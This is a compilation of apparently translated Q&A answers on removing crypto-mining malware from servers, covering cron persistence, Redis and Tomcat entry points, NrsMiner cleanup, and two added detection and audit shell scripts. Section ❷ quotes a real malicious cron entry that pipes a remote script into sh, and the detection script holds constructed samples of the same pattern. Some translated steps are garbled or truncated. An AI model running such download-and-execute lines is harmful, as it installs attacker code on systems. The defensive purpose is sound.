❶ After the server was attacked by the rshim mining virus, the HugePages_Total transparent huge pages could not be cleared and kept occupying memory.
Problem location and solution steps:
1. free -m: check the memory usage and find that free memory is basically gone. –> Suspected a memory leak in the service and started investigating.
2. Use the top command to observe that the running service does not occupy a large amount of memory, and that it stays at the same value; the service is a Java application, and its memory does not reach the upper limit set by the JVM parameters. Sorting top by memory, the total does not exceed the total physical memory. Checking hard disk usage: 20% used. This basically rules out excessive virtual memory usage. –> Ruled out a memory leak in the service; suspected mysql and nginx and started troubleshooting.
3. Nothing there: the maximum number of connections is set to 1000, and it does not exceed a few MB at most. The nginx footprint has always been very small, but every time, the first process to be killed is basically the nginx process. So I checked, and found it was nothing more than the openfiles number being adjusted; everything was fine, and nginx had been working normally before.
4. The most puzzling thing is that in free -m, memory is basically all used, the cache part is very small, and there is basically nothing free, but I can't find which processes are occupying the memory in top. No solution.
5. Noticed that two processes, although taking up a lot of memory, basically consume 100% of the CPU. At first I thought they would only occupy the CPU, not the memory; the problem at hand was memory running out and processes being killed, so I didn't pay attention to this.
6. Couldn't figure it out, so I restarted the server and all services; the service was temporarily available, and I went home. On the way home I found it had broken again. Slept apprehensively.
7. Kept looking after getting up in the morning. This time I paid attention to the two processes with high CPU usage, kdevtmpfsi and networkservice, and with the attitude of "let's see what these processes are", I searched online. The truth was clear at a glance: two mining viruses.
Suddenly realized the cause of the error:
1. The CPU usage rate is high, and a service with high CPU usage is the one most likely to push normal services past the memory limit (because when the CPU is needed there are no CPU resources, memory is heavily occupied, and the service crashes instantly); then, looking at top, the process that had just occupied the memory has already been killed, so no high memory usage is found.
2. The same thing happens as subsequent applications continue to use the CPU, and the services are gradually killed one by one.
Once the problem is basically located, solving it is relatively simple:
Through the Internet and Google, the common virus removal steps can basically solve it. These two mining viruses are very common; the main points are roughly recorded here. Probably all such viruses have these basic operations.
① First, check the scheduled tasks in the current system: crontab -l
There were four scheduled download tasks on my server that download virus files through wget and curl; delete the abnormal ones. Otherwise, even if the virus file is deleted, it will still be downloaded again.
crontab -r deletes all entries (or delete scheduled tasks as required).
② Virus files can be found by fuzzy search, but virus files are basically protected with chattr +i; use chattr -i filename and then rm -f filename to delete them.
③ Kill the virus process, but note that it may restart immediately after being killed, because there is a daemon process; the daemon process of the virus process must be killed as well.
④ Check whether the root user has been compromised, since the system configuration may have been changed.
⑤ It is better to understand the virus script and see what it does by reading the code, then repair the system according to what the script did.
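As an added example (not part of the original answer), a small POSIX shell helper for step ①: it flags the crontab entries that fetch a file with curl or wget and pipe it straight into a shell, the pattern behind the download tasks described above. The sample crontab and the 203.0.113.5 address are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the original answer): flag the crontab persistence
# pattern described in step ①, i.e. entries that fetch a remote file with
# curl/wget and pipe it straight into a shell.
# Usage: crontab -l | flag_cron_downloads   (or: cat /var/spool/cron/* | flag_cron_downloads)

# Print every non-comment crontab line of the form "curl|wget ... | sh/bash/dash".
flag_cron_downloads() {
    grep -Ev '^[[:space:]]*#' |
        grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba|da)?sh([[:space:];"]|$)'
}

# Number of flagged lines; always prints a number, even when it is 0.
count_cron_downloads() {
    flag_cron_downloads | awk 'END { print NR }'
}

# Constructed sample crontab (203.0.113.5 is a documentation address, not a real host):
# lines 3 and 4 are the download-and-execute pattern, line 5 is an ordinary download.
SAMPLE_CRONTAB='# constructed sample, not a real crontab
0 2 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.5/pm.sh | sh
*/10 * * * * wget -q -O- http://203.0.113.5/x.sh | bash
30 3 * * * wget -q https://mirror.example/pkg.tar.gz -O /tmp/pkg.tar.gz'

# With no file arguments, run against the constructed sample; otherwise scan the given files.
if [ $# -eq 0 ]; then
    printf '%s\n' "$SAMPLE_CRONTAB" | flag_cron_downloads
else
    cat "$@" | flag_cron_downloads
fi
```

Pass the crontab files of every user plus /etc/cron.d/* as arguments when checking a real host; an entry that is flagged is worth reading in full before it is removed with crontab -r.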
❷ What should I do if the Alibaba Cloud server is mined (complete beginner)
1. Block access to the mining server:
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
2. chmod -x minerd, to remove the execute permission. Do not delete minerd until the root cause is found, because if you delete it, a new one will be generated automatically.
3. pkill minerd, to kill the process.
4. service crond stop, or crontab -r to delete all scheduled tasks.
5. Run top and watch for a while; no more minerd process appears.
6. Check the /var/spool/cron/ directory and find that there is a timer file for the root user.
The download script entry:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
The content of the virus file is as follows; if you are interested, you can study it:
Solving minerd is not the ultimate goal; the main thing is to find the root cause of the problem. My server's problem lay in the redis service: the hacker used a vulnerability in redis to gain access to the server (http://blog.jobbole.com/94518/) and then injected the virus. The following is the repair and removal work:
1. Close the redis backdoor:
Configure the bind option to limit the IPs that can connect to the Redis server, and change the default redis port 6379.
Configure AUTH to set a password; note that the password is stored in plaintext in the redis configuration file.
Configure rename-command CONFIG "RENAME_CONFIG", so that even if there is unauthorized access, it is harder for attackers to use the config command.
The good news is that the author of Redis said "real users" will be developed to distinguish between ordinary users and admin permissions; ordinary users will be prohibited from running certain commands, such as conf
2. Open ~/.ssh/authorized_keys and delete keys you do not recognize.
3. Check your user list to see if any user you don't know has been added. If so, delete it.
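As an added example (not from the original answer), a POSIX shell audit of a redis.conf against the points above (bind, AUTH password, renamed CONFIG command) plus the default port. The two configs it checks are constructed; the password in the hardened one is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original answer): audit a redis.conf for the
# hardening points above. Usage: audit_redis_conf /etc/redis/redis.conf
# Prints one line per missing control; prints nothing if all are in place.
audit_redis_conf() {
    awk '
        /^[ \t]*#/ { next }                       # commented-out directives do not count
        $1 == "bind"        { bind = $2 }
        $1 == "requirepass" { pass = $2 }
        $1 == "port"        { port = $2 }
        $1 == "rename-command" && toupper($2) == "CONFIG" { renamed = 1 }
        END {
            if (bind == "")              print "bind: not set, Redis listens on every interface"
            else if (bind == "0.0.0.0")  print "bind: 0.0.0.0 still exposes every interface"
            if (pass == "")              print "requirepass: no AUTH password configured"
            if (!renamed)                print "rename-command: CONFIG has not been renamed"
            if (port == "" || port == "6379") print "port: still the default 6379"
        }' "$1"
}

# Number of findings, always printed (0 when the config passes).
count_findings() {
    audit_redis_conf "$1" | awk 'END { print NR }'
}

# Two constructed configs: the weak one has the controls missing or commented out,
# the hardened one has them set (CHANGE-ME is a placeholder password).
WEAK=$(mktemp) && HARD=$(mktemp)
trap 'rm -f "$WEAK" "$HARD"' EXIT
cat >"$WEAK" <<'EOF'
port 6379
# requirepass foobared
EOF
cat >"$HARD" <<'EOF'
bind 127.0.0.1
port 16379
requirepass CHANGE-ME-use-a-long-random-secret
rename-command CONFIG "RENAME_CONFIG"
EOF

echo "weak config:";     audit_redis_conf "$WEAK"
echo "hardened config:"; audit_redis_conf "$HARD"
```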
❸ Help, the server is invaded by a mining program, how to troubleshoot
A new customer recently consulted our SINE security company, saying that the website on his server often gets stuck and cannot be opened, and the remote connection to the server is extremely slow; sometimes the PING value is between 300-500, and packets are often dropped. Listening to the customer, one would generally judge that it had been hit by mixed CC+DDOS traffic. Asked more specifically, he said the data center reported no traffic attack. This is a bit strange: it is not a traffic attack, yet it also causes the server to get stuck and the website to be unopenable. What kind of attack is this? To solve the customer's server stalls, we immediately arranged for a security engineer to carry out security testing and security deployment on his Linux server.
The mining Trojan is also designed to automatically start mining again if the mining process is stopped by the customer. Checking the intermittent mining carefully, we found that it works by setting an hourly scheduled task that downloads the shell mining Trojan remotely and then executes it to check whether the mining process currently exists; if it does not exist, it starts the mining Trojan and begins mining.
The customer's Linux server was inspected in detail, and fortunately the server's data had not been encrypted, the virus having infected it with a worm. If the data had been encrypted, the loss would have been great; the customer runs a platform, and the customer data in it is very important. After finding the mining Trojan, the customer needed to know how the server was attacked and how the mining Trojan was uploaded, to prevent such attacks from recurring in the future.
Through the security detection and analysis of our security engineers, it was found that the server uses the apache tomcat environment, the platform's development architecture is JSP+oracle database, and the apache tomcat used is the 2016 version, which leaves apache with a serious remote command execution vulnerability. Intruders can directly invade the server through this vulnerability and get administrator rights on the server.
SINE security engineers immediately repaired the apache vulnerability and removed the Trojan horse. So far the problem has been solved, the customer's server is running stably, and the website opens normally.
❹ How to solve the problem that the server is implanted with a backdoor
Patch frequently; set more complex passwords; close temporarily unused ports and services and open them again only when required. You can try the Safedog (安全狗) security tool to check for and kill the backdoor.
❺ How to evaluate Tencent Cloud’s ability to prevent servers from being implanted with mining Trojan horses and become
You can install some antivirus software on the computers, such as Computer Housekeeper (腾讯电脑管家) and the like, and keep it running all the time. This can prevent viruses from entering the computer.
❻ How to clean up the mining virus on an Alibaba Cloud Windows server
Deleting it alone is useless, because the vulnerability has not been fixed.
The suggestion is to reinstall the system, and then ask the Guardian to do a system security reinforcement for you, so that the vulnerabilities are completely blocked; only then is it effective.
❼ There is a mining virus on the win2008 server, please answer!
If you cannot completely kill it, back up your own data and then reinstall the system; otherwise it will be really troublesome and delay work.
❽ How to clear the NrsMiner mining virus on the server
The complete removal process for the mining virus is as follows; please do it with the network disconnected:
1. Stop and disable the Hyper-V Access Protection Agent Service;
2. Delete C:\Windows\system32\NrsDataCache.tlb;
3. Delete C:.dll; if the deletion fails, rename the file to another name;
4. Restart the computer;
5. Delete the C:\Windows\system32\SysprepThemes and C:\Windows\SysprepThemes directories;
6. Delete C:\Windows\system32\SecUpdateHost.exe;
7. Go to Microsoft's official website to download the corresponding operating system patch; the download link is as follows: https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010
8. Install mainstream domestic antivirus software and update it promptly to the latest virus signature database.
❾ What should I do if the server is mined?
What did my buddy get mined by? Go report it. Back when Traffic Ore was very popular, my server was also hacked unscrupulously and turned into a zombie host. Then I went and found his information, took screenshots, and reported it to Traffic Ore, and they helped me deal with it. If you can see what you have been hit with, go to them to deal with it.
❿ What should I do if a server cluster is infected with a mining Trojan?
First of all, physically isolate it; then ask a professional security vendor to determine the type of virus; then repair the relevant system vulnerabilities; and then use special removal tools or anti-virus software to scan and kill it.